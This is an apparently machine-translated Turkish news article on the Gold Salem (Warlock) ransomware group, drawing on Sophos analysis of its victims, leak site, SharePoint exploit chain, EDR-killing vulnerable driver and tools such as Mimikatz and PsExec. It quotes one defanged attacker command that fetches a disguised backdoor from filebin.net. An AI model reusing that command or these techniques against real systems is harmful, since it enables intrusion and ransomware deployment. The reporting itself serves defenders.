Siber tehdit manzarası, Warlock Group olarak da bilinen yeni bir tehdit aktör grubu olan Gold Salem, Mart 2025’ten beri kurumsal ağlardan aktif olarak tehlikeye attığından başka bir sofistike fidye yazılımı operasyonunun ortaya çıkmasına tanık oldu.
Bu ortaya çıkan fidye yazılımı kolektifi, Kuzey Amerika, Avrupa ve Güney Amerika’da 60 kuruluşu başarıyla hedefledi ve özel büyücü fidye yazılımı yüklerini kullanırken yetkili tradecraft gösterdi.
Microsoft, bu grubu Storm-2603 olarak izledi ve atıf sonuçsuz kalmasına rağmen, Çin’den faaliyet gösterdiğine dair ılımlı bir güvenle öneriyor.
Gold Salem, küçük ticari kuruluşlardan büyük çokuluslu şirketlere kadar çeşitli kurbanları hedefleyerek rekabetçi fidye yazılımı ekosisteminde stratejik olarak konumlandırılmıştır.
Grup, fidye ödenmemiş olmasını talep ettiğinde çalınan kurban verilerini yayınlamak için TOR tabanlı bir veri sızıntısı sitesi kullanan sofistike bir çift genişlemeli model aracılığıyla çalışır.
Kurban seçimleri, Çin ve Rusya’daki hedeflerden büyük ölçüde kaçınan stratejik görünüyor, ancak Eylül 2025’te bir Rus elektrik üretim hizmetleri şirketi listelediler ve bu da geleneksel fidye yazılımı güvenli cennetlerin dışından potansiyel operasyonlar öneriyorlar.
Tehdit oyuncusu, son nokta tespiti ve yanıt sistemlerini devre dışı bırakmak için araçlar ararken, Haziran 2025’te halka açık ilk kez yeraltı forumlarında yeraltı forumlarında ve Veeam, ESXI ve SharePoint gibi kurumsal uygulamalar için istismarlar istemek üzere Ramp forumunda yayınladı.
Sophos analistleri, grubun sofistike operasyonel güvenlik önlemlerini belirledi ve ilk erişim brokerleri için işe alım çabalarını kaydetti, bu da doğrudan saldırı yeteneklerini veya hizmet olarak fidye yazılımı modelinin geliştirilmesini gösterdi.
Gold Salem’in operasyonel altyapısı gelişmiş planlama ve teknik karmaşıklığı göstermektedir.
Grup, her bir kurban için geri sayım zamanlayıcılarını korur ve genellikle veri yayınlanmasından önce fidye ödemesi için 12-14 gün izin verir.
Eylül 2025 itibariyle, kurbanlarının% 45’inden özel alıcılara veri sattığını iddia ediyorlar, ancak bu rakamlar psikolojik etki için şişirilebilir.
.webp)
Grubun veri sızıntısı sitesi, operasyonel profesyonelliğe olan bağlılıklarını yansıtan profesyonel sunum ve mağdur kategorizasyonuna sahiptir.
Gelişmiş Kırılma Teknikleri ve Güvenlik Baypas Yöntemleri
Teknik analiz, Gold Salem’in güvenlik çözümü bypass ve kalıcı ağ erişimine yönelik sofistike yaklaşımını ortaya koymaktadır.
Grup, ilk ağ uzlaşması için SharePoint sunucularını hedefleyen araç kılıfı istismar zinciri hedefleyen, CVE-2025-49704, CVE-2025-49706, CVE-2025-53770 ve CVE-2025-53771 dahil olmak üzere kritik güvenlik açıklarının bir kombinasyonundan yararlanır.
Başarılı bir sömürü üzerine, CMD için proses nesneleri oluşturan bir ASPX Web Kabası dağıtırlar.[.]IIS işçisi süreç bağlamında exe, çıktı görünürlüğü ile uzaktan komut yürütmeyi mümkün kılar.
Gözlenen özellikle dikkate değer bir teknik, komutlarının yürütülmesini web kabuğu aracılığıyla içerir:
curl - L - o c:\\users\\public\\Sophos\\Sophos-UI[.]exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks[.]exe[.]txtBu komut, ilk web kabuğundan bağımsız olarak kalıcı erişim oluşturan Golang tabanlı bir WebSockets sunucusunu indirir.
Grup, özellikle Edr Agents’ı hedefleyen keyfi süreç feshedilmesi için CVE-2024-51324’ü kullanacak şekilde yeniden adlandırılmış savunmasız bir Baidu antivirüs sürücüsü (googleapiutil64.sys) kullanarak kendi savunmasız sürücünüzü (BYOVD) tekniklerinizi getirerek gelişmiş kaçırma yeteneklerini gösterir.
Araç setleri, LSASS belleğinden kimlik doğrulama için Mimikatz, yanal hareket için Psexec ve empaket ve ağ uç noktaları arasında fidye yazılımı dağıtım için grup ilkesi nesnesi kötüye kullanımı içerir.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.